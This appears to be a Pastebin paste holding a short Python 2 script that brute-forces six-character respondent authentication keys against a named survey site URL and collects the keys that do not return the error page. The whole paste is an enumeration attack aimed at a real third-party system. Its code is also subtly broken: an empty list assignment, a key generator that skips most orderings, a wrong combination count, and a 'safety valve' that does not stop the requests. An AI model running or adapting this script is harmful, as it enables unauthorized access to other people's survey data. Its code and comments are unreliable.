Python Crawler for Sites.
rlunde Sep 6th, 2016 (edited) 12 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
- import urllib2
- import itertools
- sKey = "The respondent authentication key" # This is on all pages that are wrong.
- mainURL = "https://or.allegiancetech.de/cgi-bin/qwebcorporate.dll?idx=EUFMZ4&l=dansk&rk=" # URL to Lodam GPW.
- outList =  # Output list of functioning keys.
- keyElements = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" # List of key elements.
- subsets = itertools.combinations_with_replacement(keyElements, 6) # Generate list of elements from above.
- # WARNING: Generates 120 million combinations to test from, proceed with caution.
- iterMax = 0 # Test Protection.
- for i in subsets:
- identifier = ''.join(i) # Joins the elements of each subset to one string.
- iterMax = iterMax + 1 # Comment out below, to remove safety valve.
- if iterMax > 5:
- response = urllib2.urlopen(mainURL+identifier) # Call urllib and open webpage.
- html = response.read() # Read response.
- if sKey not in html: # Determine if sKey string is in html.
- outList.append(identifier) # If it is not, save the identifier, as it is valid.
RAW Paste Data